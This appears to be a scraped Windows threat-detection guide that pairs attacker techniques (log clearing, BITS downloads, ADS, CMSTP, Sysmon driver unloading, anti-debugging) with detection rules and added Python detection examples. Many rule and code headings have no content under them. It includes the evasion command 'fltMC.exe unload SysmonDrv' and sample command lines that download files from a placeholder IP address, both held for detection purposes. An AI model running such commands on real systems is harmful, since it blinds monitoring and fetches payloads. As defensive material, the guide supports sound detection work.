Detection Techniques
Clearing Logs
Event Log Monitoring:
Look for Event ID 1102 in the Security log and Event ID 104 in the System log.
Command to check logs:
Terminate Event Log Process
Live Analysis:
Check if the Event Log service is running.
Monitor for absence or termination of the svchost process associated with the Event Log service.
Invoke-Phant0m
PowerShell Script Block Logging:
Enable Script Block Logging to capture PowerShell script execution.
Look for specific strings or patterns in the script indicative of Invoke-Phant0m.
Mimikatz event::drop
Sysmon Process Access Monitoring:
Monitor for access to the svchost.exe process associated with the Event Log service.
Sysmon Rule:
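As an added example (not part of the original page), the following Python scans constructed Windows event records for the two log-clear events and for handles opened on the svchost.exe instance hosting the Event Log service, correlating Sysmon process-access events (ID 10) with process-creation events (ID 1) by PID; the record layout and sample values are assumptions.

```python
import re
from typing import Dict, List

# Constructed sample records (not real telemetry): Security 1102, System 104 and Sysmon
# events 1 (process create) and 10 (process access), reduced to the fields the logic uses.
EVENTS = [
    {"channel": "Security", "id": 1102, "fields": {"SubjectUserName": "alice"}},
    {"channel": "System", "id": 104,
     "fields": {"Channel": "Microsoft-Windows-Sysmon/Operational", "SubjectUserName": "alice"}},
    {"channel": "Microsoft-Windows-Sysmon/Operational", "id": 1,
     "fields": {"ProcessId": "1204", "CommandLine":
                r"C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog"}},
    {"channel": "Microsoft-Windows-Sysmon/Operational", "id": 1,
     "fields": {"ProcessId": "4412", "CommandLine":
                r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule"}},
    {"channel": "Microsoft-Windows-Sysmon/Operational", "id": 10,
     "fields": {"SourceImage": r"C:\Users\alice\Desktop\tool.exe", "TargetProcessId": "1204",
                "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1FFFFF"}},
    {"channel": "Microsoft-Windows-Sysmon/Operational", "id": 10,
     "fields": {"SourceImage": r"C:\Windows\System32\svchost.exe", "TargetProcessId": "4412",
                "TargetImage": r"C:\Windows\System32\svchost.exe", "GrantedAccess": "0x1000"}},
]

EVENTLOG_SVC = re.compile(r"-s\s+EventLog\b", re.IGNORECASE)

def detect_log_tampering(events: List[dict]) -> List[str]:
    """Return one alert per log-clear event or per handle opened on the EventLog svchost."""
    # Pass 1: map PIDs from Sysmon process-creation events to their command lines, so the
    # svchost instance hosting the EventLog service can be told apart from the other svchosts.
    cmdline_by_pid: Dict[str, str] = {}
    for ev in events:
        if ev["channel"].endswith("Sysmon/Operational") and ev["id"] == 1:
            cmdline_by_pid[ev["fields"]["ProcessId"]] = ev["fields"]["CommandLine"]
    alerts = []
    for ev in events:
        f = ev["fields"]
        if ev["channel"] == "Security" and ev["id"] == 1102:
            alerts.append(f"Security log cleared by {f['SubjectUserName']}")
        elif ev["channel"] == "System" and ev["id"] == 104:
            alerts.append(f"{f['Channel']} log cleared by {f['SubjectUserName']}")
        elif ev["channel"].endswith("Sysmon/Operational") and ev["id"] == 10:
            # Any handle on the EventLog svchost deserves review: tools that kill its
            # logging threads (Invoke-Phant0m style) need such a handle to work.
            if EVENTLOG_SVC.search(cmdline_by_pid.get(f["TargetProcessId"], "")):
                alerts.append(f"{f['SourceImage']} opened EventLog svchost pid "
                              f"{f['TargetProcessId']} with access {f['GrantedAccess']}")
    return alerts
```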
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for critical events, including process creation and termination, script execution, and registry changes.
Regular Audits: Conduct regular audits of system logs to identify patterns indicative of tampering.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious activities related to event logging.
Incident Response Plan: Have an incident response plan in place to address scenarios where event logging is compromised.
Detection Techniques
Python Payloads
Sysmon Process Creation Monitoring:
Detect Python command lines with Base64 encoded content.
Sigma Rule:
PowerShell Payloads
Sysmon Process Creation Monitoring:
Detect PowerShell command lines with encodedCommand parameters or Base64 decoding functions.
Sigma Rule:
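An added example, not from the original page, that applies the two process-creation checks above to constructed command lines in Python and decodes the Base64 payload (UTF-16LE for PowerShell's -EncodedCommand, UTF-8 otherwise) so an analyst sees what was hidden; the sample command lines are constructed.

```python
import base64
import re
from typing import List, Optional

# Constructed sample Sysmon Event ID 1 command lines (not real telemetry). PS_B64 encodes
# "Write-Host hello" as UTF-16LE, which is what PowerShell's -EncodedCommand expects.
PS_B64 = base64.b64encode("Write-Host hello".encode("utf-16-le")).decode()
PY_B64 = base64.b64encode(b"print('hello')").decode()
SAMPLE_COMMAND_LINES = [
    f"powershell.exe -NoP -W Hidden -enc {PS_B64}",
    'powershell.exe -c "[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(\'QQBCAA==\'))"',
    f'python.exe -c "import base64;exec(base64.b64decode(\'{PY_B64}\'))"',
    "python.exe -m http.server 8000",
    r"powershell.exe -File C:\Scripts\backup.ps1",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common spellings.
ENC_PARAM = re.compile(r"(?:^|\s)[-/](?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Inline decode calls used by PowerShell and Python one-liners.
B64_CALL = re.compile(r"(?:FromBase64String|b64decode)\(\s*['\"]([A-Za-z0-9+/=]{8,})['\"]", re.I)

def decode_b64(blob: str, force_utf16: bool = False) -> Optional[str]:
    """Base64-decode; use UTF-16LE when forced or when every odd byte is NUL, else UTF-8."""
    try:
        raw = base64.b64decode(blob, validate=True)
        utf16 = force_utf16 or (len(raw) > 1 and len(raw) % 2 == 0 and not any(raw[1::2]))
        return raw.decode("utf-16-le" if utf16 else "utf-8")
    except (ValueError, UnicodeDecodeError):
        return None  # padding or charset errors: not a decodable payload

def inspect_command_line(cmdline: str) -> Optional[dict]:
    """Return the technique and decoded payload, or None when nothing encoded is present."""
    image = cmdline.split()[0].lower()
    m = ENC_PARAM.search(cmdline)
    if "powershell" in image and m:
        return {"technique": "powershell -EncodedCommand", "decoded": decode_b64(m.group(1), True)}
    m = B64_CALL.search(cmdline)
    if m:
        return {"technique": "inline Base64 decode call", "decoded": decode_b64(m.group(1))}
    return None

def scan(command_lines: List[str]) -> List[dict]:
    return [{"cmdline": c, **f} for c in command_lines if (f := inspect_command_line(c))]
```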
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for command line process creation, especially for PowerShell and Python.
Regular Audits: Conduct regular audits of system logs to identify patterns indicative of Base64 encoded payloads.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious command line activities.
User Education: Educate users about the risks of executing unknown scripts or command lines.
Detection Techniques
Conhost.exe Misuse
Sysmon Process Creation Monitoring:
Detect process creation events where conhost.exe is the parent image.
Sysmon Rule:
Note: This rule is for demonstration purposes. In a production environment, it's important to include all process creation events and exclude only specific, known legitimate processes.
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for process creation, especially focusing on parent-child process relationships.
Regular Audits: Conduct regular audits of system logs to identify unusual parent-child process relationships involving conhost.exe.
Threat Hunting: Apply targeted queries to system logs based on specific hypotheses about potential misuse of conhost.exe.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious process execution patterns.
Detection Techniques
Malicious CHM Files
Sysmon Process Creation Monitoring:
Detect hh.exe process creation with command lines referring to CHM files.
Monitor for subsequent cmd.exe or PowerShell process creations with hh.exe as the parent process.
Sysmon Rule:
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for process creation, especially focusing on hh.exe and its child processes.
Regular Audits: Conduct regular audits of system logs to identify unusual process creation patterns involving CHM files.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious activities related to CHM file execution.
User Education: Educate users about the risks of opening unknown CHM files and the potential security warnings they should heed.
Detection Techniques
CMSTP Executing DLLs
Sysmon Process Creation and Image Load Monitoring:
Detect cmstp.exe process creation events.
Monitor for subsequent loading of DLLs, especially from unusual paths.
Sysmon Rule:
CMSTP Executing SCT Files
Sysmon Process Creation Monitoring:
Detect cmstp.exe process creation with command lines referencing SCT files.
Monitor for network connections or file creations following cmstp.exe execution.
Privilege Escalation via CMSTP
Behavioral Analysis:
Monitor for unusual command-line arguments or behaviors associated with cmstp.exe.
Look for signs of privilege escalation, such as cmstp.exe spawning processes with higher privileges.
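The conhost.exe, CHM (hh.exe) and CMSTP checks above can be expressed as one small rule set over Sysmon process-creation events; the following Python is an added example, not from the original page, and the sample events, field names and shell list are assumptions.

```python
import re
from typing import Callable, List, Tuple

# Constructed Sysmon Event ID 1 (process creation) records, not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\conhost.exe",
     "CommandLine": "cmd.exe /c whoami", "IntegrityLevel": "Medium"},
    {"Image": r"C:\Windows\hh.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\hh.exe C:\Users\alice\Downloads\guide.chm", "IntegrityLevel": "Medium"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\hh.exe", "CommandLine": "powershell.exe -w hidden", "IntegrityLevel": "Medium"},
    {"Image": r"C:\Windows\System32\cmstp.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmstp.exe /s C:\Users\alice\AppData\Local\Temp\setup.inf", "IntegrityLevel": "Medium"},
    {"Image": r"C:\Windows\System32\cmd.exe", "ParentImage": r"C:\Windows\System32\cmstp.exe",
     "CommandLine": "cmd.exe", "IntegrityLevel": "High"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe", "IntegrityLevel": "Medium"},
]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

# (rule name, predicate over one event). Each rule mirrors one bullet from the sections above.
RULES: List[Tuple[str, Callable[[dict], bool]]] = [
    ("conhost.exe as parent image",
     lambda e: basename(e["ParentImage"]) == "conhost.exe"),
    ("hh.exe opening a CHM file",  # noisy on its own; context for the next rule
     lambda e: basename(e["Image"]) == "hh.exe" and bool(re.search(r"\.chm\b", e["CommandLine"], re.I))),
    ("hh.exe spawning a shell",
     lambda e: basename(e["ParentImage"]) == "hh.exe" and basename(e["Image"]) in SHELLS),
    ("cmstp.exe referencing an INF or SCT file",
     lambda e: basename(e["Image"]) == "cmstp.exe" and bool(re.search(r"\.(inf|sct)\b", e["CommandLine"], re.I))),
    ("cmstp.exe spawning a high-integrity child",
     lambda e: basename(e["ParentImage"]) == "cmstp.exe" and e.get("IntegrityLevel") == "High"),
]

def evaluate(events: List[dict]) -> List[Tuple[str, str]]:
    """Return (rule name, child image) for every event that matches a rule."""
    return [(name, e["Image"]) for e in events for name, match in RULES if match(e)]
```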
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for process creation, image load, and command-line execution.
Regular Audits: Conduct regular audits of system logs to identify unusual patterns involving cmstp.exe.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious activities related to cmstp.exe execution.
User Education: Educate users about the risks of executing unknown INF or SCT files and the potential security implications.
Detection Techniques
BITS for Malicious Downloads
Sysmon Process Creation Monitoring:
Detect bitsadmin.exe or PowerShell process creation with BITS-related commands.
Sysmon Rule:
Event Viewer Monitoring:
Monitor BITS-Client events under Microsoft-Windows-Bits-Client/Operational.
Look for events showing URL downloads, especially from suspicious or unknown sources.
Network Intrusion Detection Systems (NIDS):
Monitor for network traffic with Microsoft-Bits as the User Agent.
Analyze traffic patterns that suggest BITS usage for downloading files from external sources.
Analysis of BITS Database:
For Windows versions prior to Windows 10, use bits_parser to parse qmgr[0-9].dat files.
For Windows 10, use tools like ESEDatabaseViewer to view the BITS database.
PowerShell BITS Transfer Monitoring:
Monitor for PowerShell commands involving Start-BitsTransfer.
Similar to bitsadmin.exe, look for BITS job creation and file download activities.
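An added example (not from the original page) covering both the NIDS user-agent check and the bitsadmin/Start-BitsTransfer command-line checks in Python: constructed proxy log lines and command lines, an assumed allowlist of update hosts, and the BITS User-Agent matched loosely as "Microsoft BITS" or "Microsoft-Bits"; downloads from anything outside the allowlist are reported.

```python
import re
from typing import List, Tuple
from urllib.parse import urlparse

# Constructed allowlist of hosts BITS may legitimately pull from in this environment.
ALLOWED_HOSTS = {"download.windowsupdate.com", "update.corp.example"}
# Constructed proxy log lines (not real traffic): client method url status "user-agent".
PROXY_LOG = [
    '10.0.0.5 GET http://download.windowsupdate.com/x.cab 200 "Microsoft BITS/7.8"',
    '10.0.0.7 GET http://203.0.113.9/update.bin 200 "Microsoft BITS/7.8"',
    '10.0.0.7 GET http://cdn.example.com/a.js 200 "Mozilla/5.0"',
]
# Constructed Sysmon Event ID 1 command lines.
COMMAND_LINES = [
    r"bitsadmin.exe /transfer job1 /download /priority high http://203.0.113.9/update.bin C:\Users\Public\u.exe",
    r'powershell.exe -c "Start-BitsTransfer -Source http://203.0.113.9/p.ps1 -Destination $env:TEMP\p.ps1"',
    r"bitsadmin.exe /transfer patch http://download.windowsupdate.com/x.cab C:\Temp\x.cab",
    'powershell.exe -c "Get-BitsTransfer | Complete-BitsTransfer"',
]

PROXY_RE = re.compile(r'^(\S+) (\S+) (\S+) (\d{3}) "([^"]*)"$')
# BITS identifies itself as "Microsoft BITS/<version>"; match loosely on the two tokens.
BITS_UA = re.compile(r"microsoft[ -]bits", re.I)
URL_RE = re.compile(r"https?://[^\s\"']+")
# bitsadmin /addfile (after /create) also queues a download; /transfer is the one-shot form.
BITS_CMD = re.compile(r"bitsadmin(?:\.exe)?\s.*?/(?:transfer|addfile)|start-bitstransfer", re.I)

def external_bits_traffic(lines: List[str]) -> List[Tuple[str, str, str]]:
    """(client, host, url) for BITS downloads from hosts outside the allowlist."""
    out = []
    for line in lines:
        m = PROXY_RE.match(line)
        if not m:
            continue
        client, _method, url, _status, ua = m.groups()
        host = urlparse(url).hostname or ""
        if BITS_UA.search(ua) and host not in ALLOWED_HOSTS:
            out.append((client, host, url))
    return out

def bits_download_commands(cmdlines: List[str]) -> List[Tuple[str, str]]:
    """(command line, url) for BITS job commands that fetch from non-allowlisted hosts."""
    out = []
    for c in cmdlines:
        if not BITS_CMD.search(c):
            continue
        out += [(c, u) for u in URL_RE.findall(c) if urlparse(u).hostname not in ALLOWED_HOSTS]
    return out
```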
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for process creation, BITS activities, and network traffic.
Regular Audits: Conduct regular audits of BITS logs and network traffic to identify unusual download patterns.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious BITS activities.
User Education: Educate users about the risks of unauthorized file downloads and the potential misuse of BITS.
Detection Techniques
Malicious Use of ADS
Sysmon File Stream Creation Monitoring:
Detect creation of alternate data streams, especially for executable file types.
Sysmon Rule:
Note: Exclude known legitimate ADS like Zone.Identifier.
Execution Monitoring:
Monitor for execution of files from ADS, such as using wmic, wscript, or rundll32.
Look for command-line patterns that indicate execution from an ADS.
Behavioral Analysis:
Analyze file behavior for signs of ADS usage, especially for files with unusual stream data.
Monitor for tools commonly used to manipulate ADS, like makecab and extrac32.
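An added Python example, not from the original page, that applies the stream-creation and execution checks above to constructed Sysmon Event ID 15 target filenames and Event ID 1 command lines: it splits file:stream names, excludes Zone.Identifier, flags executable stream content, and reports ADS paths handed to wmic, wscript or rundll32; the extension and launcher lists are assumptions.

```python
import re
from typing import List, Optional, Tuple

EXECUTABLE_EXT = {".exe", ".dll", ".ps1", ".vbs", ".js", ".bat", ".cmd", ".scr", ".hta"}
BENIGN_STREAMS = {"zone.identifier"}  # known-legitimate stream names; extend per environment
ADS_LAUNCHERS = {"wmic", "wmic.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}

# Constructed Sysmon Event ID 15 (FileCreateStreamHash) TargetFilename values, not real telemetry.
STREAM_EVENTS = [
    r"C:\Users\alice\Downloads\report.pdf:Zone.Identifier",
    r"C:\Users\alice\Pictures\cat.jpg:payload.exe",
    r"C:\ProgramData\notes.txt:hidden.ps1:$DATA",
    r"C:\Users\alice\Documents\data.bin:raw",
]
# Constructed Sysmon Event ID 1 command lines.
ADS_COMMAND_LINES = [
    r'wmic process call create "C:\Users\alice\Pictures\cat.jpg:payload.exe"',
    r"rundll32.exe C:\ProgramData\notes.txt:hidden.dll,DllMain",
    r"wscript.exe C:\ProgramData\notes.txt:hidden.vbs",
    r"notepad.exe C:\Users\alice\Documents\notes.txt",
]

STREAM_RE = re.compile(r"^([A-Za-z]:\\[^:]*):([^:]+?)(?::\$DATA)?$")
ADS_PATH = re.compile(r"[A-Za-z]:\\[^\s\"':,]+:[^\s\"':,]+")

def split_stream(target: str) -> Optional[Tuple[str, str]]:
    """Split 'C:\\dir\\file.ext:stream[:$DATA]' into (host file, stream); the drive colon is skipped."""
    m = STREAM_RE.match(target)
    return (m.group(1), m.group(2)) if m else None

def extension(name: str) -> str:
    return ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""

def suspicious_streams(targets: List[str]) -> List[Tuple[str, str, bool]]:
    """(host file, stream, executable) for every non-benign stream; executable is True when
    the stream or its host file carries an executable extension."""
    out = []
    for t in targets:
        parts = split_stream(t)
        if parts and parts[1].lower() not in BENIGN_STREAMS:
            host, stream = parts
            out.append((host, stream, extension(stream) in EXECUTABLE_EXT or extension(host) in EXECUTABLE_EXT))
    return out

def ads_execution(cmdlines: List[str]) -> List[Tuple[str, str]]:
    """(launcher, ADS path) where a known ADS launcher is handed a file:stream argument."""
    hits = [(c.split()[0].lower(), ADS_PATH.search(c)) for c in cmdlines]
    return [(launcher, m.group(0)) for launcher, m in hits if launcher in ADS_LAUNCHERS and m]
```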
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for file creation, especially focusing on alternate data streams.
Regular Audits: Conduct regular audits of system logs to identify unusual file stream activities.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious file activities related to ADS.
User Education: Educate users about the risks of ADS and the potential for hidden malicious content.
YARA Rule for XOR Detection
Rule: xor_detection
Purpose:
Detects common XOR encryption patterns in files or network traffic.
YARA Rule:
Detection Rules
CAPA for Hook Injection
Rule: set global application hook
Scope: Basic block
Features:
API: user32.SetWindowsHookEx
Number: 0x3 = WH_GETMESSAGE
Number: 0x0 = dwThreadId
Rule: set application hook
Scope: Function
Features:
API: user32.SetWindowsHookEx
API: user32.UnhookWindowsHookEx
SIGMA for Hook Injection
Rule: Hook Injection Detection
Description: Detects instances of hook injection in Windows.
Strings:
SetWindowsHookExA
SetWindowsHookExW
UnhookWindowsHookEx
CallNextHookEx
YARA for Hook Injection
Rule: HookInjection
Condition:
Detects use of the SetWindowsHookEx, UnhookWindowsHookEx, and CallNextHookEx functions.
Looks for specific patterns in binary files indicating hook function usage.
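For both the XOR detection rule above and the hook injection rules, the following added Python example (not from the page) does what YARA's xor string modifier does: it searches a constructed buffer for the hook API names under every single-byte XOR key and reports the key and offset of each hit; the buffer contents and filler bytes are constructed.

```python
from typing import Dict, List, Tuple

HOOK_APIS = [b"SetWindowsHookExA", b"SetWindowsHookExW", b"UnhookWindowsHookEx", b"CallNextHookEx"]

def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)

# Constructed buffer standing in for a scanned file: one API name in the clear and two hidden
# behind different single-byte XOR keys, padded with filler bytes.
SAMPLE = (b"\x00" * 16 + b"SetWindowsHookExA\x00" + b"\x90" * 8
          + xor_bytes(b"CallNextHookEx", 0x5A) + b"\xcc" * 4
          + xor_bytes(b"UnhookWindowsHookEx", 0x37) + b"\x00" * 8)

def find_xored(data: bytes, needle: bytes, keys=range(256)) -> List[Tuple[int, int]]:
    """(key, offset) for every single-byte XOR key under which needle occurs in data.
    Key 0 is the plaintext case; this mirrors YARA's `xor` string modifier."""
    hits = []
    for key in keys:
        probe = xor_bytes(needle, key)
        off = data.find(probe)
        while off != -1:
            hits.append((key, off))
            off = data.find(probe, off + 1)
    return hits

def scan_hook_apis(data: bytes) -> Dict[str, List[Tuple[int, int]]]:
    """Map each hook API name found (plain or XOR-obfuscated) to its (key, offset) hits.
    Legitimate software installs hooks too; a hit is a triage lead, not a verdict."""
    return {n.decode(): hits for n in HOOK_APIS if (hits := find_xored(data, n))}
```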
Implementation and Usage
Scanning Files and Traffic:
Use CAPA, SIGMA, and YARA to scan files or network traffic for the presence of the defined hook injection patterns.
This can be integrated into automated scanning systems or used for manual analysis.
Integration with Security Tools:
These rules can be integrated into various security tools and platforms for real-time monitoring and alerting.
Threat Hunting and Forensics:
Use these rules as part of a broader threat hunting or forensic analysis to identify potentially malicious files or network activities.
YARA Rule for DLL Search Order Hijacking Detection
Rule: DLLHijacking
Purpose:
Detects patterns in DLL files that are commonly associated with DLL Search Order Hijacking.
YARA Rule:
YARA Rule for DLL Export Name Modification Detection
Rule: ModifyDLLExportName
Purpose:
Detects patterns in DLL files that are commonly associated with modifications to DLL export names.
YARA Rule:
YARA Rule for DLL Proxying Detection
Rule: DLLProxying
Purpose:
Detects patterns in DLL files that are commonly associated with DLL Proxying.
YARA Rule:
Attack Method: Unloading Sysmon Driver
Description
Technique: Malware attempts to unload the Sysmon driver to prevent Sysmon from recording system events.
APIs Used: GetProcAddress
Attack Code:
Command:
fltMC.exe unload SysmonDrv
Author: Unprotect
YARA Rule for Detecting Unloading of Sysmon Driver
Rule: SysmonEvasion
Purpose:
Detects code patterns associated with attempts to unload the Sysmon driver.
YARA Rule:
Attack Method: Shortcut Hiding
Description
Technique: Embedding malicious code in Windows shortcuts to evade detection by antivirus software.
Attack Code:
Python script to create a Windows shortcut with an embedded file.
Author: Jean-Pierre LESUEUR
Python Script
YARA Rule for Detecting Shortcut Hiding
Rule: YARA_Detect_ShortcutHiding
Purpose:
Detects patterns in Windows shortcut files that are commonly associated with Shortcut Hiding.
YARA Rule:
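An added Python example (not the page's or the author's script) for the detection side of Shortcut Hiding: it builds a constructed minimal .lnk, appends a stand-in MZ/PE stub to model a file hidden after the shortcut structure, and flags shortcuts that are oversized or contain an embedded PE after the ShellLinkHeader; the size limit is an assumed threshold.

```python
import struct
from typing import List

LNK_HEADER_SIZE = 0x4C
# LinkCLSID {00021401-0000-0000-C000-000000000046} in on-disk (little-endian) byte order.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

def build_minimal_lnk() -> bytes:
    """Constructed sample: a ShellLinkHeader with no flags set, then the ExtraData terminal block."""
    header = struct.pack("<I16sII3Q3IHHII", LNK_HEADER_SIZE, LNK_CLSID, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)
    return header + b"\x00" * 4

# Constructed stand-in for an appended executable: an MZ stub whose e_lfanew points at 'PE\0\0'.
FAKE_PE = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 16
CLEAN_LNK = build_minimal_lnk()
TROJANIZED_LNK = CLEAN_LNK + FAKE_PE

def is_lnk(data: bytes) -> bool:
    return len(data) >= LNK_HEADER_SIZE and data[:4] == b"\x4c\x00\x00\x00" and data[4:20] == LNK_CLSID

def embedded_pe_offsets(data: bytes, start: int = LNK_HEADER_SIZE) -> List[int]:
    """Offsets of 'MZ' headers whose e_lfanew points at a valid 'PE\\0\\0' signature."""
    found, off = [], data.find(b"MZ", start)
    while off != -1:
        if off + 0x40 <= len(data):
            pe = off + struct.unpack_from("<I", data, off + 0x3C)[0]
            if pe + 4 <= len(data) and data[pe:pe + 4] == b"PE\x00\x00":
                found.append(off)
        off = data.find(b"MZ", off + 1)
    return found

def analyze_lnk(data: bytes, size_limit: int = 64 * 1024) -> dict:
    """Flag shortcuts that are implausibly large or carry an embedded PE after the header."""
    if not is_lnk(data):
        return {"is_lnk": False}
    return {"is_lnk": True, "oversized": len(data) > size_limit, "embedded_pe": embedded_pe_offsets(data)}
```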
Attack Method: NtQueryInformationProcess for Anti-Debugging
Description
Technique: Using NtQueryInformationProcess to detect if the process is currently being debugged.
Attack Code:
Delphi and C# examples to check for debugging environment.
Author: Jean-Pierre LESUEUR
Delphi Code Snippet
Detection Rules
YARA Rule: Detect_NtQueryInformationProcess
Purpose:
Detects the presence of NtQueryInformationProcess in code, which is often used for anti-debugging.
YARA Rule:
Attack Method: NtSetInformationThread for Anti-Debugging
Description
Technique: Using NtSetInformationThread to hide threads from debuggers.
Attack Code:
Delphi example to hide a thread from the debugger.
Author: Jean-Pierre LESUEUR
Delphi Code Snippet
Detection Rules
YARA Rule: Detect_NtSetInformationThread
Purpose:
Detects the presence of NtSetInformationThread in code, which is often used for anti-debugging.
YARA Rule:
Attack Method: Checking Mouse Activity for Sandbox Evasion
Description
Technique: Some sandboxes lack mouse movement or a lively desktop background, so malware checks for mouse activity to evade detection.
Attack Code:
Delphi example to check for mouse movement.
Author: Jean-Pierre LESUEUR
Delphi Code Snippet
Detection Rules
CAPA Rule: Detect Unmoving Mouse Cursor
Purpose:
Detects the presence of specific patterns in code related to checking mouse activity, a common sandbox evasion technique.
CAPA Rule: